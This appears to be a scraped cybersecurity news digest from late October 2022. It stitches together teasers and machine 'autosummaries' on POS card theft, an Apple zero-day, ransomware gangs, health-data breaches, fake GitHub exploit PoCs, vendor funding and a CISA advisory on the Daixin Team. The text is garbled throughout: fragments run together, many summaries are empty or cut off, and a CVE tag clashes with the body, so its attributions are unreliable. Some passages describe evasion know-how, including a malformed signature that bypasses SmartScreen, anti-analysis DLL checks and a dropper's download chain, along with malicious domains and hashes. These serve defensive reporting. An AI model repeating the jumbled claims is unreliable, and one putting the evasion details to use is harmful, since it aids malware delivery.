Posted: October 26, 2022 by Researchers have discovered the theft of 167,000 sets of credit card detials by MajikPOS and Treasure Hunter POS malware In the 19 months between February 2021 and September 2022, two point-of-sale (POS) malware operators have stolen more than 167,000 payment records, mainly from the US, according to researchers at Group-IB. "Categories: News Tags: iPhone Tags: iPad Tags: Apple Tags: zero day Tags: exploit Tags: bug Tags: threat Tags: CVE-2022-42847 A zero-day bug that affects iPhones and iPads is being exploited in the wild |
The post iPhone zero-day. Update your devices now! appeared first on Malwarebytes Labs.
"Autosummary:
According to Apple, the issue impacts: iPhone 8 and later iPad Pro (all models) iPad Air 3rd generation and later iPad 5th generation and later iPad mini 5th generation and later At time of writing, there is very little you can do other than fire up your Apple product and make your way to the updates section. "InterVision has teamed with Arctic Wolf to help proactively protect organizations against today’s cyberattacks. The Arctic Wolf Security Operations Cloud pairs the power, speed, and scale of a cloud-native platform with world-class security operations expertise that provides organizations with comprehensive coverage across the entire security operations framework. InterVision offers comprehensive cybersecurity protection, backed by SLAs. Ransomware Protection as a Service proactively detects, protects, and defends against cybersecurity crimes. “We are excited to have InterVision as … More
The post InterVision partners with Arctic Wolf to defend organizations against cyberattacks appeared first on Help Net Security.
"Autosummary:
"Arnica has unveiled the general availability of its product and $7 Million in seed funding. The round was led by Joule Ventures and First Rays Venture Partners, with angel investment from industry leaders including Avi Shua, co-founder & CEO of Orca Security, Dror Davidoff, co-founder & CEO of Aqua Security and Baruch Sadogursky, Head of Developer Relations of Jfrog. Arnica will use the funds to accelerate product development and scale its go-to-market teams. Software supply … More
The post Arnica raises $7 million to protect software supply chains without harming developer velocity appeared first on Help Net Security.
"Autosummary:
The round was led by Joule Ventures and First Rays Venture Partners, with angel investment from industry leaders including Avi Shua, co-founder & CEO of Orca Security, Dror Davidoff, co-founder & CEO of Aqua Security and Baruch Sadogursky, Head of Developer Relations of Jfrog. "Perygee has closed a $4.75 million seed investment led by Ballistic Ventures. The round also includes investment from cybersecurity angels Ray Rothrock, John Donovan, Ohad Finkelstein, Corey Thomas, and Bryson Bort, as well as BBG Ventures, which backs early-stage startups with female founders. To date, Perygee has raised $6.35 million in funding. Internet of Things (IoT) and Operational Technology (OT) devices are critical aspects of the supply chain, from manufacturing plants to utilities to hospitals … More
The post Perygee raises $4.75 million to secure most vulnerable IoT and OT devices appeared first on Help Net Security.
"Autosummary:
“Effectively managing several OT systems requires an intelligent solution to handle the complex data challenges,” said Andrew Schaefer, Vice President and CTO of EnVen Energy Corp. “With Perygee, we can quickly provide structure to our data, easily parse and share relevant information with different stakeholders, and automate the maintenance of our data to maintain our security posture over time.”, Schaefer continued.The round also includes investment from cybersecurity angels Ray Rothrock, John Donovan, Ohad Finkelstein, Corey Thomas, and Bryson Bort, as well as BBG Ventures, which backs early-stage startups with female founders. "Cyberattacks can cost lives — especially in the healthcare sector. Nearly a quarter of healthcare providers victimized by ransomware reported increased mortality rates following an attack, and 70% experienced longer hospital stays or procedure delays leading to poor patient outcomes. Congress is working to pass cybersecurity legislation, but the process is laborious. Consequently, healthcare systems must act to prevent security breaches and protect patients’ data. More than two-thirds of healthcare providers are victims of cybercrime. … More
The post Don’t wait for medical device cybersecurity legislation: Act now to save patients’ lives appeared first on Help Net Security.
"Autosummary:
The proposal requires the FDA to regularly update cybersecurity guidance, publish public information on improving medical device cybersecurity and resource access, and issue a report identifying challenges in cybersecurity for medical equipment, including legacy devices.The framework consists of five tenets: Identify : Identify a complete inventory of devices and software, cybersecurity policies, legal requirements, and vulnerabilities. : Identify a complete inventory of devices and software, cybersecurity policies, legal requirements, and vulnerabilities. "(ISC)² highlighted a stark increase in the shortage of cybersecurity professionals as it announced the findings of its 2022 (ISC)² Cybersecurity Workforce Study. The study reveals the global cybersecurity workforce is at an all-time high, with an estimated 4.7 million professionals. Despite adding 464,000 more cybersecurity professionals this year, the data revealed that 3.4 million more cybersecurity workers are needed to secure assets effectively. 70% of respondents report their organization does not have enough cybersecurity … More
The post To retain cybersecurity professionals, keep remote work as an option appeared first on Help Net Security.
"Autosummary:
"Northwave has conducted scientific research into the psychological effects of a ransomware crisis on both organizations and individuals. The findings reveal the deep marks that a ransomware crisis leaves on all those affected. It also shows how their IT and security teams can turn in disarray long after the crisis itself has passed. Key findings on psychological effects of ransomware “The research reveals how the psychological impact of ransomware attacks can persist on people in … More
The post The long-term psychological effects of ransomware attacks appeared first on Help Net Security.
"Autosummary:
Key findings on psychological effects of ransomware “The research reveals how the psychological impact of ransomware attacks can persist on people in affected organizations for a very long time,” explains Organizational Psychologist Inge van der Beijl, Director Behaviour & Resilience at Northwave. One of every seven employees involved in the attack, either directly or indirectly, exhibits severe enough symptoms several months later, at a level considered to be above the clinical threshold at which professional trauma treatment help is needed. These long-term effects impact staff turnover: One in five directly affected by the attack has considered, or is still considering, changing jobs. "Autosummary:
An application may be able to execute arbitrary code with kernel privileges Aside from CVE-2022-42827, the update also addresses 19 other security vulnerabilities, including two in Kernel, three in Point-to-Point Protocol (PPP), two in WebKit, and one each in AppleMobileFileIntegrity, Core Bluetooth, IOKit, Sandbox, and more. "Autosummary:
Hive ransomware starts leaking data it claims to have stolen from Tata Power Another researcher Rakesh Krishnan shared screenshots of the stolen data—which appears to include Tata Power employees" personally identifiable information (PII), National ID (Aadhar) card numbers, PAN (tax account) numbers, salary information, etc. "For the ninth time this year, Apple has released fixes for a zero-day vulnerability (CVE-2022-42827) exploited by attackers to compromise iPhones. About CVE-2022-42827 CVE-2022-42827 is an out-of-bounds write issue in the iOS and iPadOS kernel, which can be exploited to allow a malicious application to execute arbitrary code with kernel privileges. “Apple is aware of a report that this issue may have been actively exploited,” the company said, though – as per usual – did … More
The post Apple fixes exploited iOS, iPadOS zero-day (CVE-2022-42827) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The AICD eventually cancelled the event, and later made a video of the event available to stream (complete with on-air apology for the "technical difficulties") The organisation issued a statement to the press, advising anyone who entered their credit card details to inform their banks: We strongly advise any participants who may have concerns to contact their financial institution as soon as possible. "Australian private health insurance provider Medibank has revealed that the hack and data breach it discovered over two weeks ago has affected more customers than initially thought. “We have received a series of additional files from the criminal. We have been able to determine that this includes: a copy of the file received last week containing 100 ahm policy records (including personal and health claims data); a file of a further 1,000 ahm policy records … More
The post Medibank data breach: More customers affected, attacker got in via stolen credentials appeared first on Help Net Security.
"Autosummary:
These include financial support for especially vulnerable customers, a mental health and wellbeing support line for all customers, access to specialist identity protection advice and resources, free identity monitoring services for customers who have had their primary ID compromised, and reimbursement of fees for re-issue of identity documents that have been fully compromised. "Autosummary:
Most of the stolen cards are said to have been issued by banks in the U.S., Puerto Rico, Peru, Panama, the U.K., Canada, France, Poland, Norway, and Costa Rica. "The Hive ransomware gang, which claimed the responsibility for the Tata Power data breach, started leaking data. On October 14, Tata Power, India’s largest power generation company, announced that was hit by a cyber attack. Threat actors hit the Information Technology (IT) infrastructure of the company. The company confirmed that the security breach impacted “some of […]
The post Hive ransomware gang starts leaking data allegedly stolen from Tata Power appeared first on Security Affairs.
"Autosummary:
The porting to Rust language provides the following advantages: It offers memory, data type, and thread safety It has deep control over low-level resources It has a user-friendly syntax It has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption It has a good variety of cryptographic libraries It’s relatively more difficult to reverse-engineer The most important change in the latest Hive variant is the encryption mechanism it adopts. "Autosummary:
"Autosummary:
"Autosummary:
"Researchers reported that threat actors used 2 PoS malware variants to steal information about more than 167,000 credit cards. Cybersecurity firm Group-IB discovered two PoS malware to steal data associated with more than 167,000 credit cards from point-of-sale payment terminals. On April 19, 2022, Group-IB researchers identified the C2 server of the POS malware called MajikPOS. […]
The post Two PoS Malware used to steal data from more than 167,000 credit cards appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"While an exact number has yet to be verified, FBI agents have identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data from what appears to be millions of potential victims around the world," the Department of Justice said in a press release today. "Autosummary:
" Targets set on U.S. schools Vice Society is a threat group active since at least early June 2021, known for deploying multiple ransomware strains on their victims" networks, such as Hello Kitty/Five Hands and Zeppelin ransomware. "A high-severity vulnerability, tracked as CVE-2022-35737, has been disclosed in the SQLite database library. The security expert Andreas Kellas detailed a high-severity vulnerability, tracked as CVE-2022-35737 (CVSS score: 7.5), in the SQLite database library, which was introduced in October 2000. The CVE-2022-35737 flaw is an integer overflow issue that impacts SQLite versions 1.0.12 through 3.39.1. The vulnerability was […]
The post Experts disclosed a 22-year-old bug in popular SQLite Database library appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "GoSecure and Check Point partnership will enable GoSecure to add support for Check Point’s security products, expanding their open ecosystem of MDR/XDR technology partners. The new technology partnership with Check Point reinforces GoSecure’s commitment to optimizing clients’ investments in security solutions through a strategic approach to continuously improving clients’ cybersecurity defenses. By focusing on an open ecosystem of technology partners, GoSecure is creating choices for customers as they manage their cybersecurity solutions today and define … More
The post GoSecure expands partnership with Check Point to improve clients’ cybersecurity defenses appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Categories: Business Hiep Hinh breaks down his threat hunting career and shares tips and best practices for those looking to become a cyber threat hunter (or who are just interested to listen!). |
The post A cyber threat hunter talks about what he’s learned in his 16+ year cybersecurity career appeared first on Malwarebytes Labs.
"Autosummary:
“You"re gonna get an overwhelming amount of data, and will need to put it into segments, separate it, understand it, and then, potentially find something that stands out.Hiep is an expert user of Endpoint Detection and Response (EDR) platforms and is highly-skilled in incident response, DLP (data loss prevention), data mining, and threat hunting, among other things.It"s easy to go after a bunch of indicators, like lists of hashes, looking for VPN and RDP tools, and looking for a lot of freeware stuff that generally is used during attacks, such as IP scanners.” says Hiep. If worse comes to worse, however, and a cyber threat hunter doesn’t know the network well, Hiep says there are “low-hanging fruit” you can look out for.That includes SOC work, forensics, malware analysis, and more, each of which Hiep feels has over the years given him a leg-up in the world of threat hunting. "In this interview with Help Net Security, Yossi Appleboum, CEO at Sepio, talks about asset risk management challenges for different industries and where it’s heading. Cyberattacks show no signs of slowing down. What do organizations need to do to boost their asset risk management? They need to understand what’s in their environment. You can’t do anything to manage risk if you don’t know what assets you have and their associated risk posture. Increased spending on … More
The post Asset risk management: Getting the basics right appeared first on Help Net Security.
"Autosummary:
So, yes, the asset risk factor will reach new heights because it is an integral part of asset management and, in turn, cybersecurity. In the world of cybersecurity, asset management is, at its core, the understanding of IT assets in an entity’s environment.In this interview with Help Net Security, Yossi Appleboum, CEO at Sepio, talks about asset risk management challenges for different industries and where it’s heading. "Autosummary:
"Autosummary:
" Beefing up security for 2023 Attackers buy and sell breached passwords on the dark web by the millions, knowing that, due to password reuse, the average credential grants access to many accounts. The FBI and CISA had observed the Vice Society ransomware group, which took credit for the attack, using TTPs including "escalating privileges, then gaining access to domain administrator accounts." "Researchers discovered thousands of GitHub repositories that offer fake proof-of-concept (PoC) exploits for various flaws used to distribute malware. A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin The, Olga Gadyatskaya) discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities. The experts analyzed PoCs shared on […]
The post Security experts targeted with malicious CVE PoC exploits on GitHub appeared first on Security Affairs.
"Autosummary:
Some proof-of-concepts are fake (i.e., they do not actually offer PoC functionality), or even malicious: e.g., they attempt to exfiltrate data from the system they are being run on, or they try to install malware on this system.” A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin The, Olga Gadyatskaya) discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities. "Autosummary:
"Autosummary:
"Norway ’s prime minister warned last week that Russia poses “a real and serious threat” to the country’s oil and gas industry. Norway ’s prime minister Jonas Gahr Støre warned that Russia poses “a real and serious threat” to the country’s oil and gas industry. The minister claims its country is going slow in adopting […]
The post Norway PM warns of Russia cyber threat to oil and gas industry appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Furthermore, if those responsible are ever identified, the existence of the injunction may help to seek recompense one day, perhaps through seizing their assets. "The Ukraine Computer Emergency Response Team (CERT-UA) warns of Cuba Ransomware attacks against critical networks in the country. The Ukraine Computer Emergency Response Team (CERT-UA) warns of potential Cuba Ransomware attacks against local critical infrastructure. On October 21, 2022, the Ukraine CERT-UA uncovered a phishing campaign impersonating the Press Service of the General Staff of […]
The post Cuba ransomware affiliate targets Ukraine, CERT-UA warns appeared first on Security Affairs.
"Autosummary:
"Categories: Exploits and vulnerabilities Categories: News Tags: Cisco Tags: Identity Services Engine Tags: AnyConnect VPN server Tags: CVE-2022-20822 Tags: CVE-2022-20959 Tags: CVE-2022-20933 Tags: input validation Cisco"s latest security advisory includes a vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) that could allow an attacker to read and delete files. |
The post Cisco warns of ISE vulnerability with no fixed release or workaround appeared first on Malwarebytes Labs.
"Autosummary:
The CVE-2022-20959 vulnerability in the External RESTful Services (ERS) API of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. "Apple released security updates that addressed the ninth zero-day vulnerability actively exploited in the wild since the start of the year. Apple has addressed the ninth zero-day vulnerability exploited in attacks in the wild since the start of the year. The vulnerability, tracked as CVE-2022-42827, is an out-of-bounds write issue that can be exploited by an attacker to […]
The post Apple fixed the ninth actively exploited zero-day this year appeared first on Security Affairs.
"Autosummary:
"New Relic has introduced the public preview of New Relic Vulnerability Management to empower organizations to manage their security posture and risk as a core part of their observability strategy. This new offering helps engineering teams eliminate data and team silos that can cause security blind spots, slow mitigation times, and lower innovation velocity. With Vulnerability Management, all native and external security data is available in a single platform to give engineers instant visibility and … More
The post New Relic’s Vulnerability Management provides visibility across the entire software stack appeared first on Help Net Security.
"Autosummary:
Vulnerability Management is currently available in public preview as part of the New Relic platform—the all-in-one observability platform with a secure telemetry cloud for all telemetry metrics, events, logs, and traces, full-stack analysis tools, and predictable usage-based pricing instead of disjointed SKU bundles. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Medibank hack turned into a data breach: The attackers are demanding money Medibank, Australia’s largest private health provider, has confirmed that last week’s “cyber incident” has resulted in a data breach. CISA releases RedEye open-source analytic tool CISA has released RedEye, an interactive open-source analytic tool to visualize and report Red Team command and control activities. iDealwine suffers a data … More
The post Week in review: CISA releases RedEye, Apache Commons Text flaw, Medibank data breach appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: October 21, 2022 Here’s a look at the most interesting products from the past week, featuring releases from AwareGO, Code42, Corelight, EnigmaSoft, Exabeam, Mandiant, and RSA.Being technical is just one of the requirements In this Help Net Security interview, Chris Konrad, Area Vice President of Security, Global Accounts at World Wide Technology, offers advice to CISOs that are increasingly under pressure, discusses using a security maturity model, discusses interesting security technologies, and more. 3 mistakes organizations make when trying to manage data securely In this Help Net Security video, Nong Li, CEO at Okera, provides tips to avoid what he considers the top three mistakes organizations make when trying to manage data securely; data preparation, access & governance, and de-identification. "Autosummary:
Fake PoC exfiltration example (Arxiv.org) One of the researchers, El Yadmani Soufian, who is also a security researcher at Darktrace, was kind enough to provide BleepingComputer with additional examples not included in the technical report, which are given below: PowerShell PoC containing a binary encoded in base64 flagged as malicious in Virus Total. Obfuscated script and de-obfuscated Houdini In another case, the researchers spotted a fake PoC that was an info-stealer collecting system information, IP address, and user agent. "Autosummary:
Malicious site impersonating PayPal Some of the domains used for this purpose are: payce-google[.]com – impersonates Google Wallet snanpckat-apk[.]com – impersonates Snapchat vidmates-app[.]com – impersonates VidMate paltpal-apk[.]com – impersonates PayPal m-apkpures[.]com – impersonates APKPure tlktok-apk[.]link – impersonates download portal for TikTok app In all these cases, the malware delivered to users attempting to download the APKs is ERMAC, a banking trojan targeting banking accounts and cryptocurrency wallets from 467 apps. "International cash and carry giant METRO suffered this week IT infrastructure outages following a cyberattack. International cash and carry giant METRO was hit by a cyberattack that caused IT infrastructure outages. Metro employs more than 95,000 people in 681 stores worldwide, most of them in Germany, its sales reached 24.8 billion euros in 2020. The […]
The post Wholesale giant METRO confirmed to have suffered a cyberattack appeared first on Security Affairs.
"Autosummary:
"Iran’s atomic energy agency claims that alleged state-sponsored hackers have compromised its email system. Iran’s atomic energy agency revealed on Sunday that a nation-state actor had access to a subsidiary’s network and free access to its email system, the Associated Press reports. The Iranian government has yet to attribute the attack to a specific The […]
The post Hackers stole sensitive data from Iran’s atomic energy agency appeared first on Security Affairs.
"Autosummary:
The Iranian government has yet to attribute the attack to a specific The hacker group, which calls itself Black Reward announced the hack of the Atomic Energy Organization on Telegram and shared files of contracts, construction plans, and details about equipment at the Bushehr plant as proof of the intrusion. "Trilio‘s Continuous Restore offers faster levels of replication, restoration and migration of Kubernetes data and metadata from any cloud or storage platform to another, providing near-instantaneous recovery times for cloud-native applications. Entirely distribution-, cloud- and storage-agnostic, Trilio’s Continuous Restore enables users to continuously stage data in multiple heterogeneous clouds. This means that applications—regardless of where they reside—can tap into that data and be brought online in seconds, achieving exceptional levels of Recovery Time Objectives (RTO). … More
The post Trilio’s Continuous Restore enables users to stage data in multiple heterogeneous clouds appeared first on Help Net Security.
"Autosummary:
“Trilio’s Continuous Restore capability is a revolution in data protection because it moves the industry beyond ‘back-up your data anywhere, anytime’ to ‘your data is available everywhere, all the time,’” said David Safaii, CEO of Trilio. “Trilio’s Continuous Restore capability enables migration and replication of stateful applications in seconds or minutes so that all companies can protect and use their data anywhere, from core to edge—regardless of what the application runs on or where the data is stored,” said Murali Balcha, founder and CTO of Trilio. "Autosummary:
SchoolBoy"s Ransomware Gang negotiation site Source: BleepingComputer.com TommyLeaks negotiation site Source: BleepingComputer.com Even more curious, this same chat system has only been used before by the Karakurt extortion group. "Autosummary:
Signed calcxp.exe - (Checked w/ SmartScreen) Modified a byte in sig - (No SmartScreen check) pic.twitter.com/4WwdDBpU0a — Will Dormann (@wdormann) October 18, 2022 Once the signature is corrupted, Windows will not check the file using SmartScreen, as if a MoTW flag was not present, and allow it to run. Malformed signature in malicious JavaScript file Source: BleepingComputer When signed in this manner, even though the JS file was downloaded from the Internet and received a MoTW flag, Microsoft would not display the security warning, and the script would automatically execute to install the Magniber ransomware. Both of these JavaScript (.JS) files were shared with BleepingComputer, and as you can see below, they both received a Mark-of-the-Web, as indicated by the red boxes, when downloaded from a website. "Threat actors are exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace ONE Access in attacks in the wild. Threat actors are actively exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace ONE Access to deliver cryptocurrency miners and ransomware. The issue causes server-side template injection due to because of the lack of […]
The post Threat actors exploit critical flaw in VMware Workspace ONE Access to drop ransomware, miners appeared first on Security Affairs.
"Autosummary:
Threat actors are actively exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace ONE Access to deliver cryptocurrency miners and ransomware. "US government agencies warned that the Daixin Team cybercrime group is actively targeting the U.S. Healthcare and Public Health sector with ransomware. CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team cybercrime group is actively targeting U.S. businesses, mainly in the Healthcare and Public Health (HPH) Sector, […]
The post Daixin Team targets health organizations with ransomware, US agencies warn appeared first on Security Affairs.
"Autosummary:
In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents. CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team cybercrime group is actively targeting U.S. businesses, mainly in the Healthcare and Public Health (HPH) Sector, with ransomware operations. "Student Freedom Initiative and Cisco have expanded their partnership to bolster cybersecurity infrastructure at Historically Black Colleges and Universities (HBCUs) by adding three prominent Certified Minority Business Enterprises (MBEs)—Procellis Technology, Sology Solutions, and IPC Consulting—to the cybersecurity implementation team. This collaboration is a direct actionable response to the Department of Education/Federal Student Aid (FSA) guidance promulgated on December 18, 2020 for colleges and universities to comply with National Institute of Standard and Technology (NIST) 800 … More
The post Student Freedom Initiative and Cisco partnership supports cybersecurity infrastructure at HBCUs appeared first on Help Net Security.
"Autosummary:
“Over the last two years, we’ve made steady progress building scalable systems, processes, governance and technology, and establishing strategic partnerships to increase the resilience of our institutions and the global competitiveness of our students,” said Mark Brown, Executive Director of Student Freedom Initiative. "PhishLabs by HelpSystems has identified attackers leveraging a weakness in Google’s ad service to carry out phishing campaigns on financial institutions. In this Help Net Security video, Kevin Cryan, Director of Operational Intelligence at PhishLabs, talks about how this type of attack is different from the one identified by Microsoft – threat actors use conditional geolocation logic to present the legitimate landing page when Google scans their ad. Google publishes the ad and displays the … More
The post How phishing campaigns abuse Google Ad click tracking redirects appeared first on Help Net Security.
"Autosummary:
"To further address the increasing cybersecurity threat landscape, Presidio has revealed a new cybersecurity Active Response Solution Set to help clients be prepared for a ransomware event with assessments, preparedness, active response, and recovery. Ransomware is one of the largest global industries. According to IDC, 37% of global organizations were impacted by some form of ransomware in 2021. Presidio is addressing organizational needs for cyber insurance by meeting stringent minimum compliance requirements in order to … More
The post Presidio Active Response Solution Set strengthens ransomware preparedness for businesses appeared first on Help Net Security.
"Autosummary:
“Presidio’s Active Response Solution Set slices through a fragmented approach to cyber defense by joining all aspects into one simple solution,” said Sunil Jain, CEO at Marius, a cyber insurance group partnering with cybersecurity providers to streamline cyber insurance for their clients. "MetricStream has unveiled its latest product release, focused on accelerating GRC program performance. The purpose-built low-code/no-code platform empowers customers to easily personalize and configure products to their needs. New APIs help connect MetricStream with external systems and enrich GRC insights to accelerate decision making. “Today’s CXOs are under heavy pressure to balance a plethora of threats, ensure business resilience, and reduce costs,” said Prasad Sabbineni, Co-CEO, MetricStream. “It’s our belief that we can help them … More
The post MetricStream Euphrates enables enterprises to improve their GRC program performance appeared first on Help Net Security.
"Autosummary:
"A new variant of the popular Ursnif malware is used as a backdoor to deliver next-stage payloads and steal sensitive data. Mandiant researchers warn of a significant shift from Ursnif‘s original purpose, the malware initially used in banking frauds is now used to deliver next-stage payloads and steal sensitive data. The new variant, first observed […]
The post News URSNIF variant doesn’t support banking features appeared first on Security Affairs.
"Autosummary:
“The LOAD_DLL command thus allows for a simpler, more generic way of providing a plugin-like feature by extending the features of the malware via arbitrary DLL modules (in contrast to regular plugin DLLs, which must be implemented in a specific way to work with the main malware).” continues the report. "Healthcare system Advocate Aurora Health (AAH) disclosed a data breach that exposed the personal data of 3,000,000 patients. The US-based hospital healthcare system Advocate Aurora Health (AAH) disclosed a data breach that exposed the personal data of 3,000,000 patients. The company is notifying the impacted individuals. The healthcare system operates 26 hospitals in Wisconsin and […]
The post Healthcare system Advocate Aurora Health data breach potentially impacted 3M patients appeared first on Security Affairs.
"Autosummary:
Exposed patients’ data includes: IP address Dates, times, and locations of scheduled appointments Proximity to an AAH location Medical provider information Type of appointment or procedure Communications between MyChart users, which may have included first and last names and medical record numbers Insurance information Proxy account information Privacy experts pointed out that the Meta Pixel code, which is also used by many other hospitals, sends sensitive data to Meta that uses them for marketing purposes. "Medibank, Australia’s largest private health provider, has confirmed that last week’s “cyber incident” has resulted in a data breach. “Medibank has been contacted by a criminal claiming to have stolen 200GB of data,” the company said. “The criminal has provided a sample of records for 100 policies which we believe has come from our ahm and international student systems.” The extent of the Medibank data breach The attack on Medibank was spotted on October 12, … More
The post Medibank hack turned into a data breach: The attackers are demanding money appeared first on Help Net Security.
"Autosummary:
“That data includes first names and surnames, addresses, dates of birth, Medicare numbers, policy numbers, phone numbers and some claims data. "Autosummary:
"Autosummary:
Nonetheless, sharing information about threat actors, methodologies, and novel techniques is undoubtedly in everyone"s best interest and, if set in motion adequately, will enable faster responses to new threats. Also, without adequate international support, the labeling initiative will probably lead to fragmentation, just like GDPR did – as some websites now choose to simply block off all visitors from GDPR-covered regions rather than try to comply with GDPR requirements. "Autosummary:
[CPU] Also, the malware checks for the presence of the following DLL files: avghooka.dll avghookx.dll sxin.dll sf2.dll sbiedll.dll snxhk.dll cmdvrt32.dll cmdvrt64.dll wpespy.dll vmcheck.dll pstorec.dll dir_watch.dll api_log.dll dbghelp.dll The BlackByte ransomware binary also implements these same tests, but the exfiltration tool needs to run them independently since data exfiltration takes place before file encryption. "Autosummary:
"CISA added a Linux kernel vulnerability, tracked as CVE-2021-3493, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added a Linux kernel vulnerability, tracked as CVE-2021-3493, to its Known Exploited Vulnerabilities Catalog. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the […]
The post CISA adds Linux kernel flaw CVE-2021-3493 to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn. "Autosummary:
METRO store notification regarding IT issues (Günter Born) METRO is an international wholesale company for customers in the HoReCa (hotel, restaurants, and catering) industry, operating in over 30 countries and employing more than 95,000 people worldwide. "Autosummary:
The PowerShell script ("init.ps1") downloads the following files from a Cloudflare IPFS gateway: phpupdate.exe: Xmrig Monero mining software config.json: Configuration file for mining pools networkmanager.exe: Executable used to scan and spread infection phpguard.exe: Executable used for guardian Xmrig miner to keep running clean.bat: Script file to remove other cryptominers on the compromised host encrypt.exe: RAR1 ransomware If the Cloudflare resource is unavailable for any reason, the malware uses a backup link at "crustwebsites[.]net". "Actions to take today to mitigate cyber threats from ransomware:
• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recognize and report phishing attempts.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.
This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.
Download the PDF version of this report: pdf, 591 KB
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Autosummary:
Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes File SHA256 rclone-v1.59.2-windows-amd64\git-log.txt 9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238 rclone-v1.59.2-windows-amd64\rclone.1 19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD rclone-v1.59.2-windows-amd64\rclone.exe 54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939 rclone-v1.59.2-windows-amd64\README.html EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF rclone-v1.59.2-windows-amd64\README.txt 475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28 Mitigations FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity: Install updates for operating systems, software, and firmware as soon as they are released.Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have: Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations. In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk , .vmem , .vswp , .vmsd , .vmx , and .vmsn .See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches. "Autosummary:
"Autosummary:
